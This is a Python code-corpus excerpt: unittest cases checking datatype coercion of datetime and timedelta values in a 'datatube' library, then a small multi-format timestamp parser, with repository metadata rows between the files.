def test_coerce_from_datetime_to_string_no_na(self):
    """Datetimes coerce to their ISO 8601 string representations."""
    source = self.aware_datetimes
    expected = [d.isoformat() for d in self.aware_datetimes]
    # series
    assert_series_equal(coerce_dtypes(pd.Series(source), str),
                        pd.Series(expected))
    # dataframe
    assert_frame_equal(
        coerce_dtypes(pd.DataFrame({self.col_name: source}),
                      {self.col_name: str}),
        pd.DataFrame({self.col_name: expected}))
def test_coerce_from_datetime_to_string_with_na(self):
    """Datetimes plus a missing value coerce to ISO 8601 strings; the
    NA entry is carried through unchanged.
    """
    source = self.aware_datetimes + [None]
    expected = [d.isoformat() for d in self.aware_datetimes] + [None]
    # series
    assert_series_equal(coerce_dtypes(pd.Series(source), str),
                        pd.Series(expected))
    # dataframe
    assert_frame_equal(
        coerce_dtypes(pd.DataFrame({self.col_name: source}),
                      {self.col_name: str}),
        pd.DataFrame({self.col_name: expected}))
def test_coerce_from_datetime_bool_flag_to_boolean_no_na(self):
    """Datetimes whose timestamps are exactly 0 or 1 coerce losslessly
    to booleans.
    """
    source = self.bool_flags
    expected = [bool(d.timestamp()) for d in self.bool_flags]
    # series
    assert_series_equal(coerce_dtypes(pd.Series(source), bool),
                        pd.Series(expected))
    # dataframe
    assert_frame_equal(
        coerce_dtypes(pd.DataFrame({self.col_name: source}),
                      {self.col_name: bool}),
        pd.DataFrame({self.col_name: expected}))
def test_coerce_from_datetime_bool_flag_to_boolean_with_na(self):
    """0/1-timestamp datetimes plus a missing value coerce to boolean;
    the NA entry is carried through unchanged.
    """
    source = self.bool_flags + [None]
    expected = [bool(d.timestamp()) for d in self.bool_flags] + [None]
    # series
    assert_series_equal(coerce_dtypes(pd.Series(source), bool),
                        pd.Series(expected))
    # dataframe
    assert_frame_equal(
        coerce_dtypes(pd.DataFrame({self.col_name: source}),
                      {self.col_name: bool}),
        pd.DataFrame({self.col_name: expected}))
def test_coerce_from_random_datetime_to_boolean_no_na(self):
    """Arbitrary datetimes cannot be coerced to bool without data loss."""
    source = self.aware_datetimes
    # Series input: the error names "series values"
    series = pd.Series(source)
    expected_msg = (f"[datatube.dtype.coerce_dtypes] cannot coerce series "
                    f"values to {bool} without losing information (head: "
                    f"{list(series.head())})")
    with self.assertRaises(ValueError) as ctx:
        coerce_dtypes(series, bool)
    self.assertEqual(str(ctx.exception), expected_msg)
    # DataFrame input: the error names the offending column
    frame = pd.DataFrame({self.col_name: source})
    expected_msg = (f"[datatube.dtype.coerce_dtypes] cannot coerce column "
                    f"{repr(self.col_name)} to {bool} without losing "
                    f"information (head: {list(frame[self.col_name].head())})")
    with self.assertRaises(ValueError) as ctx:
        coerce_dtypes(frame, {self.col_name: bool})
    self.assertEqual(str(ctx.exception), expected_msg)
def test_coerce_from_random_datetime_to_boolean_with_na(self):
    """Lossy datetime->bool coercion is rejected even when NAs are present."""
    source = self.aware_datetimes + [None]
    # Series input: the error names "series values"
    series = pd.Series(source)
    expected_msg = (f"[datatube.dtype.coerce_dtypes] cannot coerce series "
                    f"values to {bool} without losing information (head: "
                    f"{list(series.head())})")
    with self.assertRaises(ValueError) as ctx:
        coerce_dtypes(series, bool)
    self.assertEqual(str(ctx.exception), expected_msg)
    # DataFrame input: the error names the offending column
    frame = pd.DataFrame({self.col_name: source})
    expected_msg = (f"[datatube.dtype.coerce_dtypes] cannot coerce column "
                    f"{repr(self.col_name)} to {bool} without losing "
                    f"information (head: {list(frame[self.col_name].head())})")
    with self.assertRaises(ValueError) as ctx:
        coerce_dtypes(frame, {self.col_name: bool})
    self.assertEqual(str(ctx.exception), expected_msg)
def test_coerce_from_datetime_between_0_and_1_to_boolean_no_na(self):
    """Sub-second datetimes (timestamp in (0, 1)) cannot coerce to bool."""
    source = self.datetimes_between_0_and_1
    # Series input: the error names "series values"
    series = pd.Series(source)
    expected_msg = (f"[datatube.dtype.coerce_dtypes] cannot coerce series "
                    f"values to {bool} without losing information (head: "
                    f"{list(series.head())})")
    with self.assertRaises(ValueError) as ctx:
        coerce_dtypes(series, bool)
    self.assertEqual(str(ctx.exception), expected_msg)
    # DataFrame input: the error names the offending column
    frame = pd.DataFrame({self.col_name: source})
    expected_msg = (f"[datatube.dtype.coerce_dtypes] cannot coerce column "
                    f"{repr(self.col_name)} to {bool} without losing "
                    f"information (head: {list(frame[self.col_name].head())})")
    with self.assertRaises(ValueError) as ctx:
        coerce_dtypes(frame, {self.col_name: bool})
    self.assertEqual(str(ctx.exception), expected_msg)
def test_coerce_from_datetime_between_0_and_1_to_boolean_with_na(self):
    """Sub-second datetime->bool coercion is rejected with NAs present too."""
    source = self.datetimes_between_0_and_1 + [None]
    # Series input: the error names "series values"
    series = pd.Series(source)
    expected_msg = (f"[datatube.dtype.coerce_dtypes] cannot coerce series "
                    f"values to {bool} without losing information (head: "
                    f"{list(series.head())})")
    with self.assertRaises(ValueError) as ctx:
        coerce_dtypes(series, bool)
    self.assertEqual(str(ctx.exception), expected_msg)
    # DataFrame input: the error names the offending column
    frame = pd.DataFrame({self.col_name: source})
    expected_msg = (f"[datatube.dtype.coerce_dtypes] cannot coerce column "
                    f"{repr(self.col_name)} to {bool} without losing "
                    f"information (head: {list(frame[self.col_name].head())})")
    with self.assertRaises(ValueError) as ctx:
        coerce_dtypes(frame, {self.col_name: bool})
    self.assertEqual(str(ctx.exception), expected_msg)
def test_coerce_from_datetime_to_datetime_no_na(self):
    """Coercing datetimes to datetime is an identity transform."""
    source = self.aware_datetimes
    expected = list(source)
    # Series input -> Series output
    assert_series_equal(
        coerce_dtypes(pd.Series(source), datetime),
        pd.Series(expected))
    # DataFrame input -> DataFrame output
    assert_frame_equal(
        coerce_dtypes(pd.DataFrame({self.col_name: source}),
                      {self.col_name: datetime}),
        pd.DataFrame({self.col_name: expected}))
def test_coerce_from_datetime_to_datetime_with_na(self):
    """Datetime identity coercion preserves missing values."""
    source = self.aware_datetimes + [None]
    expected = list(source)
    # Series input -> Series output
    assert_series_equal(
        coerce_dtypes(pd.Series(source), datetime),
        pd.Series(expected))
    # DataFrame input -> DataFrame output
    assert_frame_equal(
        coerce_dtypes(pd.DataFrame({self.col_name: source}),
                      {self.col_name: datetime}),
        pd.DataFrame({self.col_name: expected}))
def test_coerce_from_datetime_to_timedelta_no_na(self):
    """Datetimes coerce to timedeltas equal to their UTC epoch offset."""
    source = self.aware_datetimes
    expected = [timedelta(seconds=dt.timestamp()) for dt in source]
    # Series input -> Series output
    assert_series_equal(
        coerce_dtypes(pd.Series(source), timedelta),
        pd.Series(expected))
    # DataFrame input -> DataFrame output
    assert_frame_equal(
        coerce_dtypes(pd.DataFrame({self.col_name: source}),
                      {self.col_name: timedelta}),
        pd.DataFrame({self.col_name: expected}))
def test_coerce_from_datetime_to_timedelta_with_na(self):
    """Datetime->timedelta coercion preserves missing values."""
    source = self.aware_datetimes + [None]
    expected = ([timedelta(seconds=dt.timestamp())
                 for dt in self.aware_datetimes] + [None])
    # Series input -> Series output
    assert_series_equal(
        coerce_dtypes(pd.Series(source), timedelta),
        pd.Series(expected))
    # DataFrame input -> DataFrame output
    assert_frame_equal(
        coerce_dtypes(pd.DataFrame({self.col_name: source}),
                      {self.col_name: timedelta}),
        pd.DataFrame({self.col_name: expected}))
def test_coerce_from_datetime_to_object_no_na(self):
    """Coercion to object matches a plain astype("O") conversion."""
    source = pd.Series(self.aware_datetimes)
    expected = source.astype(np.dtype("O"))
    # Series input -> Series output
    assert_series_equal(coerce_dtypes(source, object), expected)
    # DataFrame input -> DataFrame output
    assert_frame_equal(
        coerce_dtypes(pd.DataFrame({self.col_name: source}),
                      {self.col_name: object}),
        pd.DataFrame({self.col_name: expected}))
def test_coerce_from_datetime_to_object_with_na(self):
    """Object coercion with NAs matches a plain astype("O") conversion."""
    source = pd.Series(self.aware_datetimes + [None])
    expected = source.astype(np.dtype("O"))
    # Series input -> Series output
    assert_series_equal(coerce_dtypes(source, object), expected)
    # DataFrame input -> DataFrame output
    assert_frame_equal(
        coerce_dtypes(pd.DataFrame({self.col_name: source}),
                      {self.col_name: object}),
        pd.DataFrame({self.col_name: expected}))
class CoerceTimedeltaDtypeTests(unittest.TestCase):
# Coercions FROM timedelta values to every atomic dtype, for both pd.Series
# and single-column pd.DataFrame inputs, with and without missing values.
# Error-message assertions below must match the implementation's f-strings
# byte-for-byte, so the code is left exactly as written.
@classmethod
def setUpClass(cls) -> None:
"""Build deterministic timedelta fixtures (RNG seeded for repeatability)."""
random.seed(12345)
size = 3
integers = [-1 * size // 2 + i + 1 for i in range(size)]
floats = [i + random.random() for i in integers]
cls.whole_timedeltas = [timedelta(seconds=i) for i in integers]
# ^ = [..., timedelta(-1), timedelta(0), timedelta(1), ...]
cls.timedeltas = [timedelta(seconds=f) for f in floats]
# ^ = [..., timedelta(-1+e), timedelta(0+e), timedelta(1+e), ...]
cls.timedeltas_between_0_and_1 = [timedelta(seconds=random.random())
for _ in range(size)]
# ^ = [timedelta(0+e), timedelta(0+e), timedelta(0+e), ...]
cls.bool_flags = [timedelta(seconds=(i + 1) % 2) for i in range(size)]
# ^ = [timedelta(1), timedelta(0), timedelta(1), timedelta(0), ...]
cls.col_name = "timedeltas"
def test_coerce_from_whole_timedelta_to_integer_no_na(self):
"""Whole-second timedeltas coerce losslessly to integer seconds."""
in_data = self.whole_timedeltas
out_data = [int(t.total_seconds()) for t in self.whole_timedeltas]
# series
in_series = pd.Series(in_data)
out_series = pd.Series(out_data)
result = coerce_dtypes(in_series, int)
assert_series_equal(result, out_series)
# dataframe
in_df = pd.DataFrame({self.col_name: in_data})
out_df = pd.DataFrame({self.col_name: out_data})
result = coerce_dtypes(in_df, {self.col_name: int})
assert_frame_equal(result, out_df)
def test_coerce_from_whole_timedelta_to_integer_with_na(self):
"""Whole-second timedelta->int coercion passes NAs through untouched."""
in_data = self.whole_timedeltas + [None]
out_data = ([int(t.total_seconds()) for t in self.whole_timedeltas] +
[None])
# series
in_series = pd.Series(in_data)
out_series = pd.Series(out_data)
result = coerce_dtypes(in_series, int)
assert_series_equal(result, out_series)
# dataframe
in_df = pd.DataFrame({self.col_name: in_data})
out_df = pd.DataFrame({self.col_name: out_data})
result = coerce_dtypes(in_df, {self.col_name: int})
assert_frame_equal(result, out_df)
def test_coerce_from_random_timedelta_to_integer_no_na(self):
"""Fractional-second timedeltas cannot coerce to int without data loss."""
in_data = self.timedeltas
# series
in_series = pd.Series(in_data)
err_msg = (f"[datatube.dtype.coerce_dtypes] cannot coerce series "
f"values to {int} without losing information (head: "
f"{list(in_series.head())})")
with self.assertRaises(ValueError) as err:
coerce_dtypes(in_series, int)
self.assertEqual(str(err.exception), err_msg)
# dataframe
in_df = pd.DataFrame({self.col_name: in_data})
err_msg = (f"[datatube.dtype.coerce_dtypes] cannot coerce column "
f"{repr(self.col_name)} to {int} without losing "
f"information (head: {list(in_df[self.col_name].head())})")
with self.assertRaises(ValueError) as err:
coerce_dtypes(in_df, {self.col_name: int})
self.assertEqual(str(err.exception), err_msg)
def test_coerce_from_random_timedelta_to_integer_with_na(self):
"""Lossy timedelta->int coercion is rejected even when NAs are present."""
in_data = self.timedeltas + [None]
# series
in_series = pd.Series(in_data)
err_msg = (f"[datatube.dtype.coerce_dtypes] cannot coerce series "
f"values to {int} without losing information (head: "
f"{list(in_series.head())})")
with self.assertRaises(ValueError) as err:
coerce_dtypes(in_series, int)
self.assertEqual(str(err.exception), err_msg)
# dataframe
in_df = pd.DataFrame({self.col_name: in_data})
err_msg = (f"[datatube.dtype.coerce_dtypes] cannot coerce column "
f"{repr(self.col_name)} to {int} without losing "
f"information (head: {list(in_df[self.col_name].head())})")
with self.assertRaises(ValueError) as err:
coerce_dtypes(in_df, {self.col_name: int})
self.assertEqual(str(err.exception), err_msg)
def test_coerce_from_timedelta_to_float_no_na(self):
"""Timedeltas coerce to their total seconds as floats."""
in_data = self.timedeltas
out_data = [t.total_seconds() for t in self.timedeltas]
# series
in_series = pd.Series(in_data)
out_series = pd.Series(out_data)
result = coerce_dtypes(in_series, float)
assert_series_equal(result, out_series)
# dataframe
in_df = pd.DataFrame({self.col_name: in_data})
out_df = pd.DataFrame({self.col_name: out_data})
result = coerce_dtypes(in_df, {self.col_name: float})
assert_frame_equal(result, out_df)
def test_coerce_from_timedelta_to_float_with_na(self):
"""Timedelta->float coercion passes NAs through untouched."""
in_data = self.timedeltas + [None]
out_data = [t.total_seconds() for t in self.timedeltas] + [None]
# series
in_series = pd.Series(in_data)
out_series = pd.Series(out_data)
result = coerce_dtypes(in_series, float)
assert_series_equal(result, out_series)
# dataframe
in_df = pd.DataFrame({self.col_name: in_data})
out_df = pd.DataFrame({self.col_name: out_data})
result = coerce_dtypes(in_df, {self.col_name: float})
assert_frame_equal(result, out_df)
def test_coerce_from_timedelta_to_complex_no_na(self):
"""Timedeltas coerce to complex with zero imaginary part."""
in_data = self.timedeltas
out_data = [complex(t.total_seconds(), 0) for t in self.timedeltas]
# series
in_series = pd.Series(in_data)
out_series = pd.Series(out_data)
result = coerce_dtypes(in_series, complex)
assert_series_equal(result, out_series)
# dataframe
in_df = pd.DataFrame({self.col_name: in_data})
out_df = pd.DataFrame({self.col_name: out_data})
result = coerce_dtypes(in_df, {self.col_name: complex})
assert_frame_equal(result, out_df)
def test_coerce_from_timedelta_to_complex_with_na(self):
"""Timedelta->complex coercion passes NAs through untouched."""
in_data = self.timedeltas + [None]
out_data = ([complex(t.total_seconds(), 0) for t in self.timedeltas] +
[None])
# series
in_series = pd.Series(in_data)
out_series = pd.Series(out_data)
result = coerce_dtypes(in_series, complex)
assert_series_equal(result, out_series)
# dataframe
in_df = pd.DataFrame({self.col_name: in_data})
out_df = pd.DataFrame({self.col_name: out_data})
result = coerce_dtypes(in_df, {self.col_name: complex})
assert_frame_equal(result, out_df)
def test_coerce_from_timedelta_to_string_no_na(self):
"""Timedeltas coerce to pandas' str(pd.Timedelta) representation."""
in_data = self.timedeltas
out_data = [str(pd.Timedelta(t)) for t in self.timedeltas]
# series
in_series = pd.Series(in_data)
out_series = pd.Series(out_data)
result = coerce_dtypes(in_series, str)
assert_series_equal(result, out_series)
# dataframe
in_df = pd.DataFrame({self.col_name: in_data})
out_df = pd.DataFrame({self.col_name: out_data})
result = coerce_dtypes(in_df, {self.col_name: str})
assert_frame_equal(result, out_df)
def test_coerce_from_timedelta_to_string_with_na(self):
"""Timedelta->string coercion passes NAs through untouched."""
in_data = self.timedeltas + [None]
out_data = [str(pd.Timedelta(t)) for t in self.timedeltas] + [None]
# series
in_series = pd.Series(in_data)
out_series = pd.Series(out_data)
result = coerce_dtypes(in_series, str)
assert_series_equal(result, out_series)
# dataframe
in_df = pd.DataFrame({self.col_name: in_data})
out_df = pd.DataFrame({self.col_name: out_data})
result = coerce_dtypes(in_df, {self.col_name: str})
assert_frame_equal(result, out_df)
def test_coerce_from_timedelta_bool_flag_to_boolean_no_na(self):
"""Zero/one-second timedelta flags coerce to False/True."""
in_data = self.bool_flags
out_data = [bool(d.total_seconds()) for d in self.bool_flags]
# series
in_series = pd.Series(in_data)
out_series = pd.Series(out_data)
result = coerce_dtypes(in_series, bool)
assert_series_equal(result, out_series)
# dataframe
in_df = pd.DataFrame({self.col_name: in_data})
out_df = pd.DataFrame({self.col_name: out_data})
result = coerce_dtypes(in_df, {self.col_name: bool})
assert_frame_equal(result, out_df)
def test_coerce_from_timedelta_bool_flag_to_boolean_with_na(self):
"""Boolean-flag coercion passes NAs through untouched."""
in_data = self.bool_flags + [None]
out_data = [bool(d.total_seconds()) for d in self.bool_flags] + [None]
# series
in_series = pd.Series(in_data)
out_series = pd.Series(out_data)
result = coerce_dtypes(in_series, bool)
assert_series_equal(result, out_series)
# dataframe
in_df = pd.DataFrame({self.col_name: in_data})
out_df = pd.DataFrame({self.col_name: out_data})
result = coerce_dtypes(in_df, {self.col_name: bool})
assert_frame_equal(result, out_df)
def test_coerce_from_random_timedelta_to_boolean_no_na(self):
"""Arbitrary timedeltas cannot coerce to bool without data loss."""
in_data = self.timedeltas
# series
in_series = pd.Series(in_data)
err_msg = (f"[datatube.dtype.coerce_dtypes] cannot coerce series "
f"values to {bool} without losing information (head: "
f"{list(in_series.head())})")
with self.assertRaises(ValueError) as err:
coerce_dtypes(in_series, bool)
self.assertEqual(str(err.exception), err_msg)
# dataframe
in_df = pd.DataFrame({self.col_name: in_data})
err_msg = (f"[datatube.dtype.coerce_dtypes] cannot coerce column "
f"{repr(self.col_name)} to {bool} without losing "
f"information (head: {list(in_df[self.col_name].head())})")
with self.assertRaises(ValueError) as err:
coerce_dtypes(in_df, {self.col_name: bool})
self.assertEqual(str(err.exception), err_msg)
def test_coerce_from_random_timedelta_to_boolean_with_na(self):
"""Lossy timedelta->bool coercion is rejected even with NAs present."""
in_data = self.timedeltas + [None]
# series
in_series = pd.Series(in_data)
err_msg = (f"[datatube.dtype.coerce_dtypes] cannot coerce series "
f"values to {bool} without losing information (head: "
f"{list(in_series.head())})")
with self.assertRaises(ValueError) as err:
coerce_dtypes(in_series, bool)
self.assertEqual(str(err.exception), err_msg)
# dataframe
in_df = pd.DataFrame({self.col_name: in_data})
err_msg = (f"[datatube.dtype.coerce_dtypes] cannot coerce column "
f"{repr(self.col_name)} to {bool} without losing "
f"information (head: {list(in_df[self.col_name].head())})")
with self.assertRaises(ValueError) as err:
coerce_dtypes(in_df, {self.col_name: bool})
self.assertEqual(str(err.exception), err_msg)
def test_coerce_from_timedelta_between_0_and_1_to_boolean_no_na(self):
"""Sub-second timedeltas (strictly between 0s and 1s) cannot coerce to bool."""
in_data = self.timedeltas_between_0_and_1
# series
in_series = pd.Series(in_data)
err_msg = (f"[datatube.dtype.coerce_dtypes] cannot coerce series "
f"values to {bool} without losing information (head: "
f"{list(in_series.head())})")
with self.assertRaises(ValueError) as err:
coerce_dtypes(in_series, bool)
self.assertEqual(str(err.exception), err_msg)
# dataframe
in_df = pd.DataFrame({self.col_name: in_data})
err_msg = (f"[datatube.dtype.coerce_dtypes] cannot coerce column "
f"{repr(self.col_name)} to {bool} without losing "
f"information (head: {list(in_df[self.col_name].head())})")
with self.assertRaises(ValueError) as err:
coerce_dtypes(in_df, {self.col_name: bool})
self.assertEqual(str(err.exception), err_msg)
def test_coerce_from_timedelta_between_0_and_1_to_boolean_with_na(self):
"""Sub-second timedelta->bool coercion is rejected with NAs present too."""
in_data = self.timedeltas_between_0_and_1 + [None]
# series
in_series = pd.Series(in_data)
err_msg = (f"[datatube.dtype.coerce_dtypes] cannot coerce series "
f"values to {bool} without losing information (head: "
f"{list(in_series.head())})")
with self.assertRaises(ValueError) as err:
coerce_dtypes(in_series, bool)
self.assertEqual(str(err.exception), err_msg)
# dataframe
in_df = pd.DataFrame({self.col_name: in_data})
err_msg = (f"[datatube.dtype.coerce_dtypes] cannot coerce column "
f"{repr(self.col_name)} to {bool} without losing "
f"information (head: {list(in_df[self.col_name].head())})")
with self.assertRaises(ValueError) as err:
coerce_dtypes(in_df, {self.col_name: bool})
self.assertEqual(str(err.exception), err_msg)
def test_coerce_from_timedelta_to_datetime_no_na(self):
"""Timedeltas coerce to UTC datetimes at that epoch offset."""
in_data = self.timedeltas
out_data = [datetime.fromtimestamp(t.total_seconds(), tz=timezone.utc)
for t in self.timedeltas]
# series
in_series = pd.Series(in_data)
out_series = pd.Series(out_data)
result = coerce_dtypes(in_series, datetime)
assert_series_equal(result, out_series)
# dataframe
in_df = pd.DataFrame({self.col_name: in_data})
out_df = pd.DataFrame({self.col_name: out_data})
result = coerce_dtypes(in_df, {self.col_name: datetime})
assert_frame_equal(result, out_df)
def test_coerce_from_timedelta_to_datetime_with_na(self):
"""Timedelta->datetime coercion passes NAs through untouched."""
in_data = self.timedeltas + [None]
out_data = [datetime.fromtimestamp(t.total_seconds(), tz=timezone.utc)
for t in self.timedeltas] + [None]
# series
in_series = pd.Series(in_data)
out_series = pd.Series(out_data)
result = coerce_dtypes(in_series, datetime)
assert_series_equal(result, out_series)
# dataframe
in_df = pd.DataFrame({self.col_name: in_data})
out_df = pd.DataFrame({self.col_name: out_data})
result = coerce_dtypes(in_df, {self.col_name: datetime})
assert_frame_equal(result, out_df)
def test_coerce_from_timedelta_to_timedelta_no_na(self):
"""Coercing timedeltas to timedelta is an identity transform."""
in_data = self.timedeltas
out_data = in_data.copy()
# series
in_series = pd.Series(in_data)
out_series = pd.Series(out_data)
result = coerce_dtypes(in_series, timedelta)
assert_series_equal(result, out_series)
# dataframe
in_df = pd.DataFrame({self.col_name: in_data})
out_df = pd.DataFrame({self.col_name: out_data})
result = coerce_dtypes(in_df, {self.col_name: timedelta})
assert_frame_equal(result, out_df)
def test_coerce_from_timedelta_to_timedelta_with_na(self):
"""Timedelta identity coercion preserves missing values."""
in_data = self.timedeltas + [None]
out_data = in_data.copy()
# series
in_series = pd.Series(in_data)
out_series = pd.Series(out_data)
result = coerce_dtypes(in_series, timedelta)
assert_series_equal(result, out_series)
# dataframe
in_df = pd.DataFrame({self.col_name: in_data})
out_df = pd.DataFrame({self.col_name: out_data})
result = coerce_dtypes(in_df, {self.col_name: timedelta})
assert_frame_equal(result, out_df)
def test_coerce_from_timedelta_to_object_no_na(self):
"""Coercion to object matches a plain astype("O") conversion."""
in_series = pd.Series(self.timedeltas)
out_series = in_series.astype(np.dtype("O"))
# series
result = coerce_dtypes(in_series, object)
assert_series_equal(result, out_series)
# dataframe
in_df = pd.DataFrame({self.col_name: in_series})
out_df = pd.DataFrame({self.col_name: out_series})
result = coerce_dtypes(in_df, {self.col_name: object})
assert_frame_equal(result, out_df)
def test_coerce_from_timedelta_to_object_with_na(self):
"""Object coercion with NAs matches a plain astype("O") conversion."""
in_series = pd.Series(self.timedeltas + [None])
out_series = in_series.astype(np.dtype("O"))
# series
result = coerce_dtypes(in_series, object)
assert_series_equal(result, out_series)
# dataframe
in_df = pd.DataFrame({self.col_name: in_series})
out_df = pd.DataFrame({self.col_name: out_series})
result = coerce_dtypes(in_df, {self.col_name: object})
assert_frame_equal(result, out_df)
class CoerceObjectDtypeTests(unittest.TestCase):
    """Coercions from generic object dtype to the atomic dtypes.

    The concrete test methods are placeholders; ``setUpClass`` builds the
    fixtures they will eventually exercise.
    """

    @classmethod
    def setUpClass(cls) -> None:
        class NonCastableObject:
            """Object exposing no conversion protocol at all."""
            pass

        class CastableObject:
            """Object implementing every conversion hook used for coercion."""

            def to_datetime(self) -> datetime:
                return datetime.fromtimestamp(random.randint(0, 86400),
                                              tz=timezone.utc)

            def to_timedelta(self) -> timedelta:
                return timedelta(seconds=random.randint(0, 86400))

            def __int__(self) -> int:
                return random.randint(0, 10)

            def __float__(self) -> float:
                return random.random()

            def __complex__(self) -> complex:
                return complex(random.random(), random.random())

            def __str__(self) -> str:
                # BUGFIX: random.randint is inclusive on both ends, so the
                # original (0, 26) could yield 26 -> chr(ord("a") + 26) == "{",
                # which is not a letter.  (0, 25) keeps the result in "a"-"z".
                return chr(random.randint(0, 25) + ord("a"))

            def __bool__(self) -> bool:
                return bool(random.randint(0, 1))

        size = 3
        cls.non_castable_objects = [NonCastableObject() for _ in range(size)]
        cls.castable_objects = [CastableObject() for _ in range(size)]
        cls.nones = [None for _ in range(size)]
        cls.col_name = "objects"

    def test_coerce_from_object_to_integer(self):
        pass  # TODO: implement

    def test_coerce_from_object_to_float(self):
        pass  # TODO: implement

    def test_coerce_from_object_to_complex(self):
        pass  # TODO: implement

    def test_coerce_from_object_to_string(self):
        pass  # TODO: implement

    def test_coerce_from_object_to_boolean(self):
        pass  # TODO: implement

    def test_coerce_from_object_to_datetime(self):
        pass  # TODO: implement

    def test_coerce_from_object_to_timedelta(self):
        pass  # TODO: implement

    def test_coerce_from_object_to_object(self):
        pass  # TODO: implement
# def test_check_dtypes_datetime_mixed_timezones(self):
# test_df = pd.DataFrame({"timestamp": [datetime.now(timezone.utc),
# datetime.now()]})
# self.assertTrue(check_dtypes(test_df, timestamp=datetime))
# def test_coerce_dtypes_kwargless_error(self):
# atomics = [t.__name__ if isinstance(t, type) else str(t)
# for t in AVAILABLE_DTYPES]
# err_msg = (f"[datatube.stats.coerce_dtypes] `coerce_dtypes` must be "
# f"invoked with at least one keyword argument mapping a "
# f"column in `data` to an atomic data type: "
# f"{tuple(atomics)}")
# with self.assertRaises(RuntimeError) as err:
# coerce_dtypes(self.no_na)
# self.assertEqual(str(err.exception), err_msg)
# def test_coerce_dtypes_kwargs_no_na_no_errors(self):
# for col_name, expected in self.conversions.items():
# for conv in expected:
# coerce_dtypes(self.no_na, **{col_name: conv})
# def test_coerce_dtypes_kwargs_with_na_no_errors(self):
# for col_name, expected in self.conversions.items():
# for conv in expected:
# coerce_dtypes(self.with_na, **{col_name: conv})
# def test_coerce_dtypes_matches_check_dtypes(self):
# # This does not work for coercion to <class 'object'> because of the
# # automatic convert_dtypes() step of check_dtypes. These columns will
# # always be better represented by some other data type, unless it was
# # an object to begin with.
# for col_name, expected in self.conversions.items():
# for conv in expected:
# result = coerce_dtypes(self.no_na, **{col_name: conv})
# na_result = coerce_dtypes(self.with_na, **{col_name: conv})
# check_result = check_dtypes(result, **{col_name: conv})
# check_na_result = check_dtypes(na_result, **{col_name: conv})
# if conv != object:
# try:
# self.assertTrue(check_result)
# self.assertTrue(check_na_result)
# except AssertionError as exc:
# err_msg = (f"col_name: {repr(col_name)}, typespec: "
# f"{conv}, expected: {expected}")
# raise AssertionError(err_msg) from exc
# def test_coerce_dtypes_returns_copy(self):
# result = coerce_dtypes(self.with_na, a=float)
# self.assertNotEqual(list(result.dtypes), list(self.with_na.dtypes))
# def test_coerce_dtypes_datetime_preserves_timezone(self):
# raise NotImplementedError()
# Run this module's test suite when executed directly (python <file>.py).
if __name__ == "__main__":
unittest.main()
| 40.286612
| 80
| 0.634175
| 16,410
| 121,867
| 4.388787
| 0.014381
| 0.051027
| 0.077284
| 0.064676
| 0.960941
| 0.955873
| 0.948875
| 0.943918
| 0.933435
| 0.913205
| 0
| 0.003513
| 0.259529
| 121,867
| 3,025
| 81
| 40.286612
| 0.79459
| 0.059302
| 0
| 0.817529
| 0
| 0
| 0.09488
| 0.047238
| 0
| 0
| 0
| 0
| 0.187261
| 1
| 0.090038
| false
| 0.00431
| 0.004789
| 0.003352
| 0.103448
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
afe8be14fffe4eab282e23a16681b34737931618
| 1,946
|
py
|
Python
|
lesson-12/01/timestamp.py
|
minimum-hsu/tutorial-python
|
667692e7cd13a8a4d061a4da530dc2dfe25ac1de
|
[
"MIT"
] | null | null | null |
lesson-12/01/timestamp.py
|
minimum-hsu/tutorial-python
|
667692e7cd13a8a4d061a4da530dc2dfe25ac1de
|
[
"MIT"
] | null | null | null |
lesson-12/01/timestamp.py
|
minimum-hsu/tutorial-python
|
667692e7cd13a8a4d061a4da530dc2dfe25ac1de
|
[
"MIT"
] | null | null | null |
from datetime import datetime
def parse_timestamp(t):
    """Parse a timestamp string in any of several common formats.

    Each known format is tried in order; the first one that matches wins.
    Aware inputs (formats with ``%z``) are converted to UTC by
    ``datetime.utctimetuple()``; naive inputs are returned as-is.

    Parameters
    ----------
    t : str
        Timestamp text, e.g. ``"2020-01-02T03:04:05Z"``.

    Returns
    -------
    time.struct_time or None
        The parsed UTC time tuple, or ``None`` when no format matches.
    """
    # Order matters and mirrors the original try-chain: literal-"Z" formats
    # are attempted before the %z variants.
    formats = (
        '%Y-%m-%dT%H:%M:%SZ',
        '%Y-%m-%dT%H:%M:%S.%fZ',
        '%Y-%m-%dT%H:%M:%S%z',
        '%Y-%m-%dT%H:%M:%S.%f%z',
        '%Y-%m-%dT%H:%M:%S',
        '%Y-%m-%dT%H:%M:%S.%f',
        '%Y-%m-%d %H:%M:%SZ',
        '%Y-%m-%d %H:%M:%S.%fZ',
        '%Y-%m-%d %H:%M:%S%z',
        '%Y-%m-%d %H:%M:%S.%f%z',
        '%Y-%m-%d %H:%M:%S',
        '%Y-%m-%d %H:%M:%S.%f',
        '%a %b %d %H:%M:%S %Z %Y',
    )
    for fmt in formats:
        try:
            return datetime.strptime(t, fmt).utctimetuple()
        except (ValueError, TypeError):
            # ValueError: `t` does not match this format.
            # TypeError: `t` is not a string (the original bare `except`
            # silently swallowed this case too, so keep that behavior).
            continue
    return None
| 17.531532
| 37
| 0.400308
| 204
| 1,946
| 3.813725
| 0.127451
| 0.150386
| 0.284062
| 0.417738
| 0.898458
| 0.892031
| 0.892031
| 0.892031
| 0.892031
| 0.892031
| 0
| 0
| 0.44964
| 1,946
| 110
| 38
| 17.690909
| 0.726424
| 0
| 0
| 0.829787
| 0
| 0
| 0.132134
| 0.022108
| 0
| 0
| 0
| 0
| 0
| 1
| 0.010638
| false
| 0.138298
| 0.010638
| 0
| 0.170213
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 10
|
b328226b7a463946689852a8e54f45bd61fef3b4
| 14,450
|
py
|
Python
|
tests/test_table_aggregation/test_schema_matcher.py
|
afcarl/corvid
|
e257074edeac1e8dce4a737b60e93a9bea37b6b9
|
[
"Apache-2.0"
] | 1
|
2019-04-15T13:49:39.000Z
|
2019-04-15T13:49:39.000Z
|
tests/test_table_aggregation/test_schema_matcher.py
|
